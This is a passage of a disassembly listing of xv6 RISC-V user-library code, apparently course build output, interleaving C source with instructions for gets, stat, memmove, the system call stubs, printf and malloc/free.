5be: 00000097 auipc ra,0x0 5c2: 19c080e7 jalr 412(ra) # 75a <read> if(cc < 1) 5c6: 00a05e63 blez a0,5e2 <gets+0x56> buf[i++] = c; 5ca: faf44783 lbu a5,-81(s0) 5ce: 00f90023 sb a5,0(s2) if(c == '\n' || c == '\r') 5d2: 01578763 beq a5,s5,5e0 <gets+0x54> 5d6: 0905 addi s2,s2,1 5d8: fd679be3 bne a5,s6,5ae <gets+0x22> for(i=0; i+1 < max; ){ 5dc: 89a6 mv s3,s1 5de: a011 j 5e2 <gets+0x56> 5e0: 89a6 mv s3,s1 break; } buf[i] = '\0'; 5e2: 99de add s3,s3,s7 5e4: 00098023 sb zero,0(s3) return buf; } 5e8: 855e mv a0,s7 5ea: 60e6 ld ra,88(sp) 5ec: 6446 ld s0,80(sp) 5ee: 64a6 ld s1,72(sp) 5f0: 6906 ld s2,64(sp) 5f2: 79e2 ld s3,56(sp) 5f4: 7a42 ld s4,48(sp) 5f6: 7aa2 ld s5,40(sp) 5f8: 7b02 ld s6,32(sp) 5fa: 6be2 ld s7,24(sp) 5fc: 6125 addi sp,sp,96 5fe: 8082 ret 0000000000000600 <stat>: int stat(const char *n, struct stat *st) { 600: 1101 addi sp,sp,-32 602: ec06 sd ra,24(sp) 604: e822 sd s0,16(sp) 606: e426 sd s1,8(sp) 608: e04a sd s2,0(sp) 60a: 1000 addi s0,sp,32 60c: 892e mv s2,a1 int fd; int r; fd = open(n, O_RDONLY); 60e: 4581 li a1,0 610: 00000097 auipc ra,0x0 614: 172080e7 jalr 370(ra) # 782 <open> if(fd < 0) 618: 02054563 bltz a0,642 <stat+0x42> 61c: 84aa mv s1,a0 return -1; r = fstat(fd, st); 61e: 85ca mv a1,s2 620: 00000097 auipc ra,0x0 624: 17a080e7 jalr 378(ra) # 79a <fstat> 628: 892a mv s2,a0 close(fd); 62a: 8526 mv a0,s1 62c: 00000097 auipc ra,0x0 630: 13e080e7 jalr 318(ra) # 76a <close> return r; } 634: 854a mv a0,s2 636: 60e2 ld ra,24(sp) 638: 6442 ld s0,16(sp) 63a: 64a2 ld s1,8(sp) 63c: 6902 ld s2,0(sp) 63e: 6105 addi sp,sp,32 640: 8082 ret return -1; 642: 597d li s2,-1 644: bfc5 j 634 <stat+0x34> 0000000000000646 <atoi>: int atoi(const char *s) { 646: 1141 addi sp,sp,-16 648: e422 sd s0,8(sp) 64a: 0800 addi s0,sp,16 int n; n = 0; while('0' <= *s && *s <= '9') 64c: 00054603 lbu a2,0(a0) 650: fd06079b addiw a5,a2,-48 654: 0ff7f793 andi a5,a5,255 658: 4725 li a4,9 65a: 02f76963 bltu a4,a5,68c <atoi+0x46> 65e: 86aa mv a3,a0 n = 0; 660: 4501 li a0,0 while('0' <= *s && *s <= '9') 662: 45a5 li a1,9 n = n*10 + *s++ - '0'; 664: 0685 addi a3,a3,1 666: 0025179b slliw a5,a0,0x2 66a: 9fa9 addw a5,a5,a0 66c: 0017979b slliw a5,a5,0x1 670: 9fb1 addw a5,a5,a2 672: fd07851b addiw a0,a5,-48 while('0' <= *s && *s <= '9') 676: 0006c603 lbu a2,0(a3) 67a: fd06071b addiw a4,a2,-48 67e: 0ff77713 andi a4,a4,255 682: fee5f1e3 bgeu a1,a4,664 <atoi+0x1e> return n; } 686: 6422 ld s0,8(sp) 688: 0141 addi sp,sp,16 68a: 8082 ret n = 0; 68c: 4501 li a0,0 68e: bfe5 j 686 <atoi+0x40> 0000000000000690 <memmove>: void* memmove(void *vdst, const void *vsrc, int n) { 690: 1141 addi sp,sp,-16 692: e422 sd s0,8(sp) 694: 0800 addi s0,sp,16 char *dst; const char *src; dst = vdst; src = vsrc; if (src > dst) { 696: 02b57463 bgeu a0,a1,6be <memmove+0x2e> while(n-- > 0) 69a: 00c05f63 blez a2,6b8 <memmove+0x28> 69e: 1602 slli a2,a2,0x20 6a0: 9201 srli a2,a2,0x20 6a2: 00c507b3 add a5,a0,a2 dst = vdst; 6a6: 872a mv a4,a0 *dst++ = *src++; 6a8: 0585 addi a1,a1,1 6aa: 0705 addi a4,a4,1 6ac: fff5c683 lbu a3,-1(a1) 6b0: fed70fa3 sb a3,-1(a4) while(n-- > 0) 6b4: fee79ae3 bne a5,a4,6a8 <memmove+0x18> src += n; while(n-- > 0) *--dst = *--src; } return vdst; } 6b8: 6422 ld s0,8(sp) 6ba: 0141 addi sp,sp,16 6bc: 8082 ret dst += n; 6be: 00c50733 add a4,a0,a2 src += n; 6c2: 95b2 add a1,a1,a2 while(n-- > 0) 6c4: fec05ae3 blez a2,6b8 <memmove+0x28> 6c8: fff6079b addiw a5,a2,-1 6cc: 1782 slli a5,a5,0x20 6ce: 9381 srli a5,a5,0x20 6d0: fff7c793 not a5,a5 6d4: 97ba add a5,a5,a4 *--dst = *--src; 6d6: 15fd addi a1,a1,-1 6d8: 177d addi a4,a4,-1 6da: 0005c683 lbu a3,0(a1) 6de: 00d70023 sb a3,0(a4) while(n-- > 0) 6e2: fee79ae3 bne a5,a4,6d6 <memmove+0x46> 6e6: bfc9 j 6b8 <memmove+0x28> 00000000000006e8 <memcmp>: int memcmp(const void *s1, const void *s2, uint n) { 6e8: 1141 addi sp,sp,-16 6ea: e422 sd s0,8(sp) 6ec: 0800 addi s0,sp,16 const char *p1 = s1, *p2 = s2; while (n-- > 0) { 6ee: ca05 beqz a2,71e <memcmp+0x36> 6f0: fff6069b addiw a3,a2,-1 6f4: 1682 slli a3,a3,0x20 6f6: 9281 srli a3,a3,0x20 6f8: 0685 addi a3,a3,1 6fa: 96aa add a3,a3,a0 if (*p1 != *p2) { 6fc: 00054783 lbu a5,0(a0) 700: 0005c703 lbu a4,0(a1) 704: 00e79863 bne a5,a4,714 <memcmp+0x2c> return *p1 - *p2; } p1++; 708: 0505 addi a0,a0,1 p2++; 70a: 0585 addi a1,a1,1 while (n-- > 0) { 70c: fed518e3 bne a0,a3,6fc <memcmp+0x14> } return 0; 710: 4501 li a0,0 712: a019 j 718 <memcmp+0x30> return *p1 - *p2; 714: 40e7853b subw a0,a5,a4 } 718: 6422 ld s0,8(sp) 71a: 0141 addi sp,sp,16 71c: 8082 ret return 0; 71e: 4501 li a0,0 720: bfe5 j 718 <memcmp+0x30> 0000000000000722 <memcpy>: void * memcpy(void *dst, const void *src, uint n) { 722: 1141 addi sp,sp,-16 724: e406 sd ra,8(sp) 726: e022 sd s0,0(sp) 728: 0800 addi s0,sp,16 return memmove(dst, src, n); 72a: 00000097 auipc ra,0x0 72e: f66080e7 jalr -154(ra) # 690 <memmove> } 732: 60a2 ld ra,8(sp) 734: 6402 ld s0,0(sp) 736: 0141 addi sp,sp,16 738: 8082 ret 000000000000073a <fork>: # generated by usys.pl - do not edit #include "kernel/syscall.h" .global fork fork: li a7, SYS_fork 73a: 4885 li a7,1 ecall 73c: 00000073 ecall ret 740: 8082 ret 0000000000000742 <exit>: .global exit exit: li a7, SYS_exit 742: 4889 li a7,2 ecall 744: 00000073 ecall ret 748: 8082 ret 000000000000074a <wait>: .global wait wait: li a7, SYS_wait 74a: 488d li a7,3 ecall 74c: 00000073 ecall ret 750: 8082 ret 0000000000000752 <pipe>: .global pipe pipe: li a7, SYS_pipe 752: 4891 li a7,4 ecall 754: 00000073 ecall ret 758: 8082 ret 000000000000075a <read>: .global read read: li a7, SYS_read 75a: 4895 li a7,5 ecall 75c: 00000073 ecall ret 760: 8082 ret 0000000000000762 <write>: .global write write: li a7, SYS_write 762: 48c1 li a7,16 ecall 764: 00000073 ecall ret 768: 8082 ret 000000000000076a <close>: .global close close: li a7, SYS_close 76a: 48d5 li a7,21 ecall 76c: 00000073 ecall ret 770: 8082 ret 0000000000000772 <kill>: .global kill kill: li a7, SYS_kill 772: 4899 li a7,6 ecall 774: 00000073 ecall ret 778: 8082 ret 000000000000077a <exec>: .global exec exec: li a7, SYS_exec 77a: 489d li a7,7 ecall 77c: 00000073 ecall ret 780: 8082 ret 0000000000000782 <open>: .global open open: li a7, SYS_open 782: 48bd li a7,15 ecall 784: 00000073 ecall ret 788: 8082 ret 000000000000078a <mknod>: .global mknod mknod: li a7, SYS_mknod 78a: 48c5 li a7,17 ecall 78c: 00000073 ecall ret 790: 8082 ret 0000000000000792 <unlink>: .global unlink unlink: li a7, SYS_unlink 792: 48c9 li a7,18 ecall 794: 00000073 ecall ret 798: 8082 ret 000000000000079a <fstat>: .global fstat fstat: li a7, SYS_fstat 79a: 48a1 li a7,8 ecall 79c: 00000073 ecall ret 7a0: 8082 ret 00000000000007a2 <link>: .global link link: li a7, SYS_link 7a2: 48cd li a7,19 ecall 7a4: 00000073 ecall ret 7a8: 8082 ret 00000000000007aa <mkdir>: .global mkdir mkdir: li a7, SYS_mkdir 7aa: 48d1 li a7,20 ecall 7ac: 00000073 ecall ret 7b0: 8082 ret 00000000000007b2 <chdir>: .global chdir chdir: li a7, SYS_chdir 7b2: 48a5 li a7,9 ecall 7b4: 00000073 ecall ret 7b8: 8082 ret 00000000000007ba <dup>: .global dup dup: li a7, SYS_dup 7ba: 48a9 li a7,10 ecall 7bc: 00000073 ecall ret 7c0: 8082 ret 00000000000007c2 <getpid>: .global getpid getpid: li a7, SYS_getpid 7c2: 48ad li a7,11 ecall 7c4: 00000073 ecall ret 7c8: 8082 ret 00000000000007ca <sbrk>: .global sbrk sbrk: li a7, SYS_sbrk 7ca: 48b1 li a7,12 ecall 7cc: 00000073 ecall ret 7d0: 8082 ret 00000000000007d2 <sleep>: .global sleep sleep: li a7, SYS_sleep 7d2: 48b5 li a7,13 ecall 7d4: 00000073 ecall ret 7d8: 8082 ret 00000000000007da <uptime>: .global uptime uptime: li a7, SYS_uptime 7da: 48b9 li a7,14 ecall 7dc: 00000073 ecall ret 7e0: 8082 ret 00000000000007e2 <ntas>: .global ntas ntas: li a7, SYS_ntas 7e2: 48d9 li a7,22 ecall 7e4: 00000073 ecall ret 7e8: 8082 ret 00000000000007ea <putc>: static char digits[] = "0123456789ABCDEF"; static void putc(int fd, char c) { 7ea: 1101 addi sp,sp,-32 7ec: ec06 sd ra,24(sp) 7ee: e822 sd s0,16(sp) 7f0: 1000 addi s0,sp,32 7f2: feb407a3 sb a1,-17(s0) write(fd, &c, 1); 7f6: 4605 li a2,1 7f8: fef40593 addi a1,s0,-17 7fc: 00000097 auipc ra,0x0 800: f66080e7 jalr -154(ra) # 762 <write> } 804: 60e2 ld ra,24(sp) 806: 6442 ld s0,16(sp) 808: 6105 addi sp,sp,32 80a: 8082 ret 000000000000080c <printint>: static void printint(int fd, int xx, int base, int sgn) { 80c: 7139 addi sp,sp,-64 80e: fc06 sd ra,56(sp) 810: f822 sd s0,48(sp) 812: f426 sd s1,40(sp) 814: f04a sd s2,32(sp) 816: ec4e sd s3,24(sp) 818: 0080 addi s0,sp,64 81a: 84aa mv s1,a0 char buf[16]; int i, neg; uint x; neg = 0; if(sgn && xx < 0){ 81c: c299 beqz a3,822 <printint+0x16> 81e: 0805c863 bltz a1,8ae <printint+0xa2> neg = 1; x = -xx; } else { x = xx; 822: 2581 sext.w a1,a1 neg = 0; 824: 4881 li a7,0 826: fc040693 addi a3,s0,-64 } i = 0; 82a: 4701 li a4,0 do{ buf[i++] = digits[x % base]; 82c: 2601 sext.w a2,a2 82e: 00000517 auipc a0,0x0 832: 55250513 addi a0,a0,1362 # d80 <digits> 836: 883a mv a6,a4 838: 2705 addiw a4,a4,1 83a: 02c5f7bb remuw a5,a1,a2 83e: 1782 slli a5,a5,0x20 840: 9381 srli a5,a5,0x20 842: 97aa add a5,a5,a0 844: 0007c783 lbu a5,0(a5) 848: 00f68023 sb a5,0(a3) }while((x /= base) != 0); 84c: 0005879b sext.w a5,a1 850: 02c5d5bb divuw a1,a1,a2 854: 0685 addi a3,a3,1 856: fec7f0e3 bgeu a5,a2,836 <printint+0x2a> if(neg) 85a: 00088b63 beqz a7,870 <printint+0x64> buf[i++] = '-'; 85e: fd040793 addi a5,s0,-48 862: 973e add a4,a4,a5 864: 02d00793 li a5,45 868: fef70823 sb a5,-16(a4) 86c: 0028071b addiw a4,a6,2 while(--i >= 0) 870: 02e05863 blez a4,8a0 <printint+0x94> 874: fc040793 addi a5,s0,-64 878: 00e78933 add s2,a5,a4 87c: fff78993 addi s3,a5,-1 880: 99ba add s3,s3,a4 882: 377d addiw a4,a4,-1 884: 1702 slli a4,a4,0x20 886: 9301 srli a4,a4,0x20 888: 40e989b3 sub s3,s3,a4 putc(fd, buf[i]); 88c: fff94583 lbu a1,-1(s2) 890: 8526 mv a0,s1 892: 00000097 auipc ra,0x0 896: f58080e7 jalr -168(ra) # 7ea <putc> while(--i >= 0) 89a: 197d addi s2,s2,-1 89c: ff3918e3 bne s2,s3,88c <printint+0x80> } 8a0: 70e2 ld ra,56(sp) 8a2: 7442 ld s0,48(sp) 8a4: 74a2 ld s1,40(sp) 8a6: 7902 ld s2,32(sp) 8a8: 69e2 ld s3,24(sp) 8aa: 6121 addi sp,sp,64 8ac: 8082 ret x = -xx; 8ae: 40b005bb negw a1,a1 neg = 1; 8b2: 4885 li a7,1 x = -xx; 8b4: bf8d j 826 <printint+0x1a> 00000000000008b6 <vprintf>: } // Print to the given fd. Only understands %d, %x, %p, %s. void vprintf(int fd, const char *fmt, va_list ap) { 8b6: 7119 addi sp,sp,-128 8b8: fc86 sd ra,120(sp) 8ba: f8a2 sd s0,112(sp) 8bc: f4a6 sd s1,104(sp) 8be: f0ca sd s2,96(sp) 8c0: ecce sd s3,88(sp) 8c2: e8d2 sd s4,80(sp) 8c4: e4d6 sd s5,72(sp) 8c6: e0da sd s6,64(sp) 8c8: fc5e sd s7,56(sp) 8ca: f862 sd s8,48(sp) 8cc: f466 sd s9,40(sp) 8ce: f06a sd s10,32(sp) 8d0: ec6e sd s11,24(sp) 8d2: 0100 addi s0,sp,128 char *s; int c, i, state; state = 0; for(i = 0; fmt[i]; i++){ 8d4: 0005c903 lbu s2,0(a1) 8d8: 18090f63 beqz s2,a76 <vprintf+0x1c0> 8dc: 8aaa mv s5,a0 8de: 8b32 mv s6,a2 8e0: 00158493 addi s1,a1,1 state = 0; 8e4: 4981 li s3,0 if(c == '%'){ state = '%'; } else { putc(fd, c); } } else if(state == '%'){ 8e6: 02500a13 li s4,37 if(c == 'd'){ 8ea: 06400c13 li s8,100 printint(fd, va_arg(ap, int), 10, 1); } else if(c == 'l') { 8ee: 06c00c93 li s9,108 printint(fd, va_arg(ap, uint64), 10, 0); } else if(c == 'x') { 8f2: 07800d13 li s10,120 printint(fd, va_arg(ap, int), 16, 0); } else if(c == 'p') { 8f6: 07000d93 li s11,112 putc(fd, digits[x >> (sizeof(uint64) * 8 - 4)]); 8fa: 00000b97 auipc s7,0x0 8fe: 486b8b93 addi s7,s7,1158 # d80 <digits> 902: a839 j 920 <vprintf+0x6a> putc(fd, c); 904: 85ca mv a1,s2 906: 8556 mv a0,s5 908: 00000097 auipc ra,0x0 90c: ee2080e7 jalr -286(ra) # 7ea <putc> 910: a019 j 916 <vprintf+0x60> } else if(state == '%'){ 912: 01498f63 beq s3,s4,930 <vprintf+0x7a> for(i = 0; fmt[i]; i++){ 916: 0485 addi s1,s1,1 918: fff4c903 lbu s2,-1(s1) 91c: 14090d63 beqz s2,a76 <vprintf+0x1c0> c = fmt[i] & 0xff; 920: 0009079b sext.w a5,s2 if(state == 0){ 924: fe0997e3 bnez s3,912 <vprintf+0x5c> if(c == '%'){ 928: fd479ee3 bne a5,s4,904 <vprintf+0x4e> state = '%'; 92c: 89be mv s3,a5 92e: b7e5 j 916 <vprintf+0x60> if(c == 'd'){ 930: 05878063 beq a5,s8,970 <vprintf+0xba> } else if(c == 'l') { 934: 05978c63 beq a5,s9,98c <vprintf+0xd6> } else if(c == 'x') { 938: 07a78863 beq a5,s10,9a8 <vprintf+0xf2> } else if(c == 'p') { 93c: 09b78463 beq a5,s11,9c4 <vprintf+0x10e> printptr(fd, va_arg(ap, uint64)); } else if(c == 's'){ 940: 07300713 li a4,115 944: 0ce78663 beq a5,a4,a10 <vprintf+0x15a> s = "(null)"; while(*s != 0){ putc(fd, *s); s++; } } else if(c == 'c'){ 948: 06300713 li a4,99 94c: 0ee78e63 beq a5,a4,a48 <vprintf+0x192> putc(fd, va_arg(ap, uint)); } else if(c == '%'){ 950: 11478863 beq a5,s4,a60 <vprintf+0x1aa> putc(fd, c); } else { // Unknown % sequence. Print it to draw attention. putc(fd, '%'); 954: 85d2 mv a1,s4 956: 8556 mv a0,s5 958: 00000097 auipc ra,0x0 95c: e92080e7 jalr -366(ra) # 7ea <putc> putc(fd, c); 960: 85ca mv a1,s2 962: 8556 mv a0,s5 964: 00000097 auipc ra,0x0 968: e86080e7 jalr -378(ra) # 7ea <putc> } state = 0; 96c: 4981 li s3,0 96e: b765 j 916 <vprintf+0x60> printint(fd, va_arg(ap, int), 10, 1); 970: 008b0913 addi s2,s6,8 974: 4685 li a3,1 976: 4629 li a2,10 978: 000b2583 lw a1,0(s6) 97c: 8556 mv a0,s5 97e: 00000097 auipc ra,0x0 982: e8e080e7 jalr -370(ra) # 80c <printint> 986: 8b4a mv s6,s2 state = 0; 988: 4981 li s3,0 98a: b771 j 916 <vprintf+0x60> printint(fd, va_arg(ap, uint64), 10, 0); 98c: 008b0913 addi s2,s6,8 990: 4681 li a3,0 992: 4629 li a2,10 994: 000b2583 lw a1,0(s6) 998: 8556 mv a0,s5 99a: 00000097 auipc ra,0x0 99e: e72080e7 jalr -398(ra) # 80c <printint> 9a2: 8b4a mv s6,s2 state = 0; 9a4: 4981 li s3,0 9a6: bf85 j 916 <vprintf+0x60> printint(fd, va_arg(ap, int), 16, 0); 9a8: 008b0913 addi s2,s6,8 9ac: 4681 li a3,0 9ae: 4641 li a2,16 9b0: 000b2583 lw a1,0(s6) 9b4: 8556 mv a0,s5 9b6: 00000097 auipc ra,0x0 9ba: e56080e7 jalr -426(ra) # 80c <printint> 9be: 8b4a mv s6,s2 state = 0; 9c0: 4981 li s3,0 9c2: bf91 j 916 <vprintf+0x60> printptr(fd, va_arg(ap, uint64)); 9c4: 008b0793 addi a5,s6,8 9c8: f8f43423 sd a5,-120(s0) 9cc: 000b3983 ld s3,0(s6) putc(fd, '0'); 9d0: 03000593 li a1,48 9d4: 8556 mv a0,s5 9d6: 00000097 auipc ra,0x0 9da: e14080e7 jalr -492(ra) # 7ea <putc> putc(fd, 'x'); 9de: 85ea mv a1,s10 9e0: 8556 mv a0,s5 9e2: 00000097 auipc ra,0x0 9e6: e08080e7 jalr -504(ra) # 7ea <putc> 9ea: 4941 li s2,16 putc(fd, digits[x >> (sizeof(uint64) * 8 - 4)]); 9ec: 03c9d793 srli a5,s3,0x3c 9f0: 97de add a5,a5,s7 9f2: 0007c583 lbu a1,0(a5) 9f6: 8556 mv a0,s5 9f8: 00000097 auipc ra,0x0 9fc: df2080e7 jalr -526(ra) # 7ea <putc> for (i = 0; i < (sizeof(uint64) * 2); i++, x <<= 4) a00: 0992 slli s3,s3,0x4 a02: 397d addiw s2,s2,-1 a04: fe0914e3 bnez s2,9ec <vprintf+0x136> printptr(fd, va_arg(ap, uint64)); a08: f8843b03 ld s6,-120(s0) state = 0; a0c: 4981 li s3,0 a0e: b721 j 916 <vprintf+0x60> s = va_arg(ap, char*); a10: 008b0993 addi s3,s6,8 a14: 000b3903 ld s2,0(s6) if(s == 0) a18: 02090163 beqz s2,a3a <vprintf+0x184> while(*s != 0){ a1c: 00094583 lbu a1,0(s2) a20: c9a1 beqz a1,a70 <vprintf+0x1ba> putc(fd, *s); a22: 8556 mv a0,s5 a24: 00000097 auipc ra,0x0 a28: dc6080e7 jalr -570(ra) # 7ea <putc> s++; a2c: 0905 addi s2,s2,1 while(*s != 0){ a2e: 00094583 lbu a1,0(s2) a32: f9e5 bnez a1,a22 <vprintf+0x16c> s = va_arg(ap, char*); a34: 8b4e mv s6,s3 state = 0; a36: 4981 li s3,0 a38: bdf9 j 916 <vprintf+0x60> s = "(null)"; a3a: 00000917 auipc s2,0x0 a3e: 33e90913 addi s2,s2,830 # d78 <malloc+0x1f8> while(*s != 0){ a42: 02800593 li a1,40 a46: bff1 j a22 <vprintf+0x16c> putc(fd, va_arg(ap, uint)); a48: 008b0913 addi s2,s6,8 a4c: 000b4583 lbu a1,0(s6) a50: 8556 mv a0,s5 a52: 00000097 auipc ra,0x0 a56: d98080e7 jalr -616(ra) # 7ea <putc> a5a: 8b4a mv s6,s2 state = 0; a5c: 4981 li s3,0 a5e: bd65 j 916 <vprintf+0x60> putc(fd, c); a60: 85d2 mv a1,s4 a62: 8556 mv a0,s5 a64: 00000097 auipc ra,0x0 a68: d86080e7 jalr -634(ra) # 7ea <putc> state = 0; a6c: 4981 li s3,0 a6e: b565 j 916 <vprintf+0x60> s = va_arg(ap, char*); a70: 8b4e mv s6,s3 state = 0; a72: 4981 li s3,0 a74: b54d j 916 <vprintf+0x60> } } } a76: 70e6 ld ra,120(sp) a78: 7446 ld s0,112(sp) a7a: 74a6 ld s1,104(sp) a7c: 7906 ld s2,96(sp) a7e: 69e6 ld s3,88(sp) a80: 6a46 ld s4,80(sp) a82: 6aa6 ld s5,72(sp) a84: 6b06 ld s6,64(sp) a86: 7be2 ld s7,56(sp) a88: 7c42 ld s8,48(sp) a8a: 7ca2 ld s9,40(sp) a8c: 7d02 ld s10,32(sp) a8e: 6de2 ld s11,24(sp) a90: 6109 addi sp,sp,128 a92: 8082 ret 0000000000000a94 <fprintf>: void fprintf(int fd, const char *fmt, ...) { a94: 715d addi sp,sp,-80 a96: ec06 sd ra,24(sp) a98: e822 sd s0,16(sp) a9a: 1000 addi s0,sp,32 a9c: e010 sd a2,0(s0) a9e: e414 sd a3,8(s0) aa0: e818 sd a4,16(s0) aa2: ec1c sd a5,24(s0) aa4: 03043023 sd a6,32(s0) aa8: 03143423 sd a7,40(s0) va_list ap; va_start(ap, fmt); aac: fe843423 sd s0,-24(s0) vprintf(fd, fmt, ap); ab0: 8622 mv a2,s0 ab2: 00000097 auipc ra,0x0 ab6: e04080e7 jalr -508(ra) # 8b6 <vprintf> } aba: 60e2 ld ra,24(sp) abc: 6442 ld s0,16(sp) abe: 6161 addi sp,sp,80 ac0: 8082 ret 0000000000000ac2 <printf>: void printf(const char *fmt, ...) { ac2: 711d addi sp,sp,-96 ac4: ec06 sd ra,24(sp) ac6: e822 sd s0,16(sp) ac8: 1000 addi s0,sp,32 aca: e40c sd a1,8(s0) acc: e810 sd a2,16(s0) ace: ec14 sd a3,24(s0) ad0: f018 sd a4,32(s0) ad2: f41c sd a5,40(s0) ad4: 03043823 sd a6,48(s0) ad8: 03143c23 sd a7,56(s0) va_list ap; va_start(ap, fmt); adc: 00840613 addi a2,s0,8 ae0: fec43423 sd a2,-24(s0) vprintf(1, fmt, ap); ae4: 85aa mv a1,a0 ae6: 4505 li a0,1 ae8: 00000097 auipc ra,0x0 aec: dce080e7 jalr -562(ra) # 8b6 <vprintf> } af0: 60e2 ld ra,24(sp) af2: 6442 ld s0,16(sp) af4: 6125 addi sp,sp,96 af6: 8082 ret 0000000000000af8 <free>: static Header base; static Header *freep; void free(void *ap) { af8: 1141 addi sp,sp,-16 afa: e422 sd s0,8(sp) afc: 0800 addi s0,sp,16 Header *bp, *p; bp = (Header*)ap - 1; afe: ff050693 addi a3,a0,-16 for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr) b02: 00000797 auipc a5,0x0 b06: 2967b783 ld a5,662(a5) # d98 <freep> b0a: a805 j b3a <free+0x42> if(p >= p->s.ptr && (bp > p || bp < p->s.ptr)) break; if(bp + bp->s.size == p->s.ptr){ bp->s.size += p->s.ptr->s.size; b0c: 4618 lw a4,8(a2) b0e: 9db9 addw a1,a1,a4 b10: feb52c23 sw a1,-8(a0) bp->s.ptr = p->s.ptr->s.ptr; b14: 6398 ld a4,0(a5) b16: 6318 ld a4,0(a4) b18: fee53823 sd a4,-16(a0) b1c: a091 j b60 <free+0x68> } else bp->s.ptr = p->s.ptr; if(p + p->s.size == bp){ p->s.size += bp->s.size; b1e: ff852703 lw a4,-8(a0) b22: 9e39 addw a2,a2,a4 b24: c790 sw a2,8(a5) p->s.ptr = bp->s.ptr; b26: ff053703 ld a4,-16(a0) b2a: e398 sd a4,0(a5) b2c: a099 j b72 <free+0x7a> if(p >= p->s.ptr && (bp > p || bp < p->s.ptr)) b2e: 6398 ld a4,0(a5) b30: 00e7e463 bltu a5,a4,b38 <free+0x40> b34: 00e6ea63 bltu a3,a4,b48 <free+0x50> { b38: 87ba mv a5,a4 for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr) b3a: fed7fae3 bgeu a5,a3,b2e <free+0x36> b3e: 6398 ld a4,0(a5) b40: 00e6e463 bltu a3,a4,b48 <free+0x50> if(p >= p->s.ptr && (bp > p || bp < p->s.ptr)) b44: fee7eae3 bltu a5,a4,b38 <free+0x40> if(bp + bp->s.size == p->s.ptr){ b48: ff852583 lw a1,-8(a0) b4c: 6390 ld a2,0(a5) b4e: 02059813 slli a6,a1,0x20 b52: 01c85713 srli a4,a6,0x1c b56: 9736 add a4,a4,a3 b58: fae60ae3 beq a2,a4,b0c <free+0x14> bp->s.ptr = p->s.ptr; b5c: fec53823 sd a2,-16(a0) if(p + p->s.size == bp){ b60: 4790 lw a2,8(a5) b62: 02061593 slli a1,a2,0x20 b66: 01c5d713 srli a4,a1,0x1c b6a: 973e add a4,a4,a5 b6c: fae689e3 beq a3,a4,b1e <free+0x26> } else p->s.ptr = bp; b70: e394 sd a3,0(a5) freep = p; b72: 00000717 auipc a4,0x0 b76: 22f73323 sd a5,550(a4) # d98 <freep> } b7a: 6422 ld s0,8(sp) b7c: 0141 addi sp,sp,16 b7e: 8082 ret 0000000000000b80 <malloc>: return freep; } void* malloc(uint nbytes) { b80: 7139 addi sp,sp,-64 b82: fc06 sd ra,56(sp) b84: f822 sd s0,48(sp) b86: f426 sd s1,40(sp) b88: f04a sd s2,32(sp) b8a: ec4e sd s3,24(sp) b8c: e852 sd s4,16(sp) b8e: e456 sd s5,8(sp) b90: e05a sd s6,0(sp) b92: 0080 addi s0,sp,64 Header *p, *prevp; uint nunits; nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1; b94: 02051493 slli s1,a0,0x20 b98: 9081 srli s1,s1,0x20 b9a: 04bd addi s1,s1,15 b9c: 8091 srli s1,s1,0x4 b9e: 0014899b addiw s3,s1,1 ba2: 0485 addi s1,s1,1 if((prevp = freep) == 0){ ba4: 00000517 auipc a0,0x0 ba8: 1f453503 ld a0,500(a0) # d98 <freep> bac: c515 beqz a0,bd8 <malloc+0x58> base.s.ptr = freep = prevp = &base; base.s.size = 0; } for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){ bae: 611c ld a5,0(a0) if(p->s.size >= nunits){ bb0: 4798 lw a4,8(a5) bb2: 02977f63 bgeu a4,s1,bf0 <malloc+0x70> bb6: 8a4e mv s4,s3 bb8: 0009871b sext.w a4,s3 bbc: 6685 lui a3,0x1 bbe: 00d77363 bgeu a4,a3,bc4 <malloc+0x44> bc2: 6a05 lui s4,0x1 bc4: 000a0b1b sext.w s6,s4 p = sbrk(nu * sizeof(Header)); bc8: 004a1a1b slliw s4,s4,0x4 p->s.size = nunits; } freep = prevp; return (void*)(p + 1); } if(p == freep) bcc: 00000917 auipc s2,0x0 bd0: 1cc90913 addi s2,s2,460 # d98 <freep> if(p == (char*)-1) bd4: 5afd li s5,-1 bd6: a895 j c4a <malloc+0xca> base.s.ptr = freep = prevp = &base; bd8: 00000797 auipc a5,0x0 bdc: 1c878793 addi a5,a5,456 # da0 <base> be0: 00000717 auipc a4,0x0 be4: 1af73c23 sd a5,440(a4) # d98 <freep> be8: e39c sd a5,0(a5) base.s.size = 0; bea: 0007a423 sw zero,8(a5) if(p->s.size >= nunits){ bee: b7e1 j bb6 <malloc+0x36> if(p->s.size == nunits) bf0: 02e48c63 beq s1,a4,c28 <malloc+0xa8> p->s.size -= nunits; bf4: 4137073b subw a4,a4,s3 bf8: c798 sw a4,8(a5) p += p->s.size; bfa: 02071693 slli a3,a4,0x20 bfe: 01c6d713 srli a4,a3,0x1c c02: 97ba add a5,a5,a4 p->s.size = nunits; c04: 0137a423 sw s3,8(a5) freep = prevp; c08: 00000717 auipc a4,0x0 c0c: 18a73823 sd a0,400(a4) # d98 <freep> return (void*)(p + 1); c10: 01078513 addi a0,a5,16 if((p = morecore(nunits)) == 0) return 0; } } c14: 70e2 ld ra,56(sp) c16: 7442 ld s0,48(sp) c18: 74a2 ld s1,40(sp) c1a: 7902 ld s2,32(sp) c1c: 69e2 ld s3,24(sp) c1e: 6a42 ld s4,16(sp) c20: 6aa2 ld s5,8(sp) c22: 6b02 ld s6,0(sp) c24: 6121 addi sp,sp,64 c26: 8082 ret prevp->s.ptr = p->s.ptr; c28: 6398 ld a4,0(a5) c2a: e118 sd a4,0(a0) c2c: bff1 j c08 <malloc+0x88> hp->s.size = nu; c2e: 01652423 sw s6,8(a0) free((void*)(hp + 1)); c32: 0541 addi a0,a0,16 c34: 00000097 auipc ra,0x0 c38: ec4080e7 jalr -316(ra) # af8 <free> return freep; c3c: 00093503 ld a0,0(s2) if((p = morecore(nunits)) == 0) c40: d971 beqz a0,c14 <malloc+0x94> for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){ c42: 611c ld a5,0(a0) if(p->s.size >= nunits){ c44: 4798 lw a4,8(a5) c46: fa9775e3 bgeu a4,s1,bf0 <malloc+0x70> if(p == freep) c4a: 00093703 ld a4,0(s2) c4e: 853e mv a0,a5 c50: fef719e3 bne a4,a5,c42 <malloc+0xc2> p = sbrk(nu * sizeof(Header)); c54: 8552 mv a0,s4 c56: 00000097 auipc 